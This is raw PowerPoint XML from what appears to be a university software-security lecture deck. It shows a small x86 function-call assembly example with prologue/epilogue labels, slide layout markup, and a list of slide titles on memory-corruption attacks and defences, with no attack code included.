                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x18,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x28,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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-0x4(</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leave</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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="3265291"/>
            <a:ext cx="1756527" cy="830903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Right Bracket 6"/>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8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="5659908"/>
            <a:ext cx="1756527" cy="709842"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Bracket 9"/>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1" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="506830"/>
            <a:ext cx="1756527" cy="576903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Bracket 12"/>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4" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="2366075"/>
            <a:ext cx="1756527" cy="633380"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Right Bracket 15"/>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7" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15233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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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2084" y="30509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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991529" y="5377554"/>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91529" y="6125240"/>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91529" y="5727526"/>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32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xEl>
                                              <p:pRg st="17" end="1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18" end="1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xEl>
                                              <p:pRg st="19" end="1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xEl>
                                              <p:pRg st="22" end="2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xEl>
                                              <p:pRg st="23" end="2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
                                            <p:txEl>
                                              <p:pRg st="24" end="2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
                                            <p:txEl>
                                              <p:pRg st="25" end="2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xEl>
                                              <p:pRg st="26" end="2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xEl>
                                              <p:pRg st="27" end="2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xEl>
                                              <p:pRg st="28" end="28"/>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
                                            <p:txEl>
                                              <p:pRg st="29" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="3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
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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xEl>
                                              <p:pRg st="33" end="33"/>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
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>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xEl>
                                              <p:pRg st="36" end="36"/>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
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>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
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>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
                                            <p:txEl>
                                              <p:pRg st="40" end="4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1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8" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="adam_seclab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headEnd type="none"/>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139161</TotalTime>
  <Words>28539</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>8651</Paragraphs>
  <Slides>333</Slides>
  <Notes>137</Notes>
  <HiddenSlides>36</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333</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="344" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>MS Mincho</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ Pro W3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Application Insecurity</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Model</vt:lpstr>
      <vt:lpstr>Application Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Design Vulnerabilities</vt:lpstr>
      <vt:lpstr>Implementation Vulnerabilities</vt:lpstr>
      <vt:lpstr>Deployment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Remote vs. Local Attacks </vt:lpstr>
      <vt:lpstr>The Life of an Application</vt:lpstr>
      <vt:lpstr>Interpretation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>ELF Sections</vt:lpstr>
      <vt:lpstr>Typical ELF Sections</vt:lpstr>
      <vt:lpstr>The PE File Format</vt:lpstr>
      <vt:lpstr>The x86 CPU Family</vt:lpstr>
      <vt:lpstr>Memory Addressing in x86</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>EFLAGS</vt:lpstr>
      <vt:lpstr>Data Sizes</vt:lpstr>
      <vt:lpstr>Beware of the Endianess  (and of Signed Integers)!</vt:lpstr>
      <vt:lpstr>x86 Assembly Language</vt:lpstr>
      <vt:lpstr>Data Definition</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Invoking System Calls</vt:lpstr>
      <vt:lpstr>Hello World!</vt:lpstr>
      <vt:lpstr>PLT and GOT</vt:lpstr>
      <vt:lpstr>The .dtors Section</vt:lpstr>
      <vt:lpstr>Program Loading and Execution</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Process Structure</vt:lpstr>
      <vt:lpstr>Understanding UNIX Processes</vt:lpstr>
      <vt:lpstr>SUID Behavior</vt:lpstr>
      <vt:lpstr>Disassembling</vt:lpstr>
      <vt:lpstr>Radare</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>Hopper</vt:lpstr>
      <vt:lpstr>Attacking UNIX Systems</vt:lpstr>
      <vt:lpstr>Attacking UNIX Applications</vt:lpstr>
      <vt:lpstr>Attack Classes</vt:lpstr>
      <vt:lpstr>File Access Attacks</vt:lpstr>
      <vt:lpstr>The Dot-Dot Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>PATH and HOME Attacks</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Link Attacks</vt:lpstr>
      <vt:lpstr>The dtappgather Attack</vt:lpstr>
      <vt:lpstr>The dtappgather Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>TOCTTOU Attacks</vt:lpstr>
      <vt:lpstr>TOCTTOU Example</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>File Handler Reuse</vt:lpstr>
      <vt:lpstr>The chpass Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>A Simple Example</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Frames</vt:lpstr>
      <vt:lpstr>Calling Convention</vt:lpstr>
      <vt:lpstr>x86 Linux Calling Convention (cdecl)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Stack Overflows</vt:lpstr>
      <vt:lpstr>Implications of Cdecl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“Overflowing” Functions </vt:lpstr>
      <vt:lpstr>How to Exploit a Stack Overflow</vt:lpstr>
      <vt:lpstr>Shell Code Goal</vt:lpstr>
      <vt:lpstr>C-version of Shell Code</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>The Shell Code</vt:lpstr>
      <vt:lpstr>Invoking the System Calls</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Position Independent Shellcode</vt:lpstr>
      <vt:lpstr>Position Independent Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>No Null No Newline Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>Jumping to the Shell Code</vt:lpstr>
      <vt:lpstr>Jumping to the Shell Code</vt:lpstr>
      <vt:lpstr>Guessing the Buffer Address</vt:lpstr>
      <vt:lpstr>NOP Sled</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Overflowing Small Buffers</vt:lpstr>
      <vt:lpstr>Generalizing Memory Corruption</vt:lpstr>
      <vt:lpstr>What Is Overwritten</vt:lpstr>
      <vt:lpstr>What is Overwritten: Long Jumps</vt:lpstr>
      <vt:lpstr>setjmp() and longjmp()</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>Designing an Exploit</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>What is Overwritten:  A Carefully (?) Developed Program</vt:lpstr>
      <vt:lpstr>Non-terminated String Overflow</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Index Overflow</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Loop Overflows</vt:lpstr>
      <vt:lpstr>Off-by-one Overflow: Example</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>Overflown Stack Before Returning</vt:lpstr>
      <vt:lpstr>Tracking The Frame Pointer</vt:lpstr>
      <vt:lpstr>Exploiting an Off-by-one Overflow</vt:lpstr>
      <vt:lpstr>Smashing the Frame Pointer</vt:lpstr>
      <vt:lpstr>Finding the Buffer Address</vt:lpstr>
      <vt:lpstr>Determining &amp;&amp;shellcode</vt:lpstr>
      <vt:lpstr>Computing the Overflowing Byte  and &amp;shellcode</vt:lpstr>
      <vt:lpstr>Overflowed Buffer Contents</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>What Happens Next?</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>Lessons Learned </vt:lpstr>
      <vt:lpstr>What is Overwritten: Format String Vulnerabilities</vt:lpstr>
      <vt:lpstr>printf()’s Lesser Known Facts</vt:lpstr>
      <vt:lpstr>A Simple Vulnerable Program</vt:lpstr>
      <vt:lpstr>Sample Executions</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>GOT</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>The locale attack</vt:lpstr>
      <vt:lpstr>LC_MESSAGE/libc.po</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Where is Overwritten:  DATA and BSS Overflows</vt:lpstr>
      <vt:lpstr>Where is Overwritten: Heap Overflows</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Case Study: Doug Lea’s Malloc</vt:lpstr>
      <vt:lpstr>Memory Layout</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Bin Management</vt:lpstr>
      <vt:lpstr>Memory Allocation</vt:lpstr>
      <vt:lpstr>Memory Deallocation</vt:lpstr>
      <vt:lpstr>List Handling: unlink()</vt:lpstr>
      <vt:lpstr>List Handling: frontlink()</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Double free() Vulnerabilities</vt:lpstr>
      <vt:lpstr>Overwriting C++ Vtables</vt:lpstr>
      <vt:lpstr>Memory Corruption Protections</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Linux Stack Protection</vt:lpstr>
      <vt:lpstr>DEP and W^X</vt:lpstr>
      <vt:lpstr>Problem with Non-Executable Memory</vt:lpstr>
      <vt:lpstr>Return-into-libc Overflows</vt:lpstr>
      <vt:lpstr>Return-into-libc Overflows </vt:lpstr>
      <vt:lpstr>Executing Multiple Functions</vt:lpstr>
      <vt:lpstr>Copying the Shellcode</vt:lpstr>
      <vt:lpstr>Executing Arbitrary Sequences of Functions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Gadgets</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>StackGuard</vt:lpstr>
      <vt:lpstr>Stack Canaries in Linux</vt:lpstr>
      <vt:lpstr>Bypassing Canaries</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR in Linux</vt:lpstr>
      <vt:lpstr>Exploitation under ASLR</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Control Flow Integrity</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Distributions/Tools</vt:lpstr>
      <vt:lpstr>Metasploit on Kali Linux</vt:lpstr>
      <vt:lpstr>General Process </vt:lpstr>
      <vt:lpstr>Metasploit Components</vt:lpstr>
      <vt:lpstr>Metasploit Modules</vt:lpstr>
      <vt:lpstr>Metasploit Console</vt:lpstr>
      <vt:lpstr>The Meterpreter</vt:lpstr>
      <vt:lpstr>Conclusions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Adam Doupe</cp:lastModifiedBy>
  <cp:revision>3339</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-02T01:41:52Z</dcterms:modified>
</cp:coreProperties>
</file>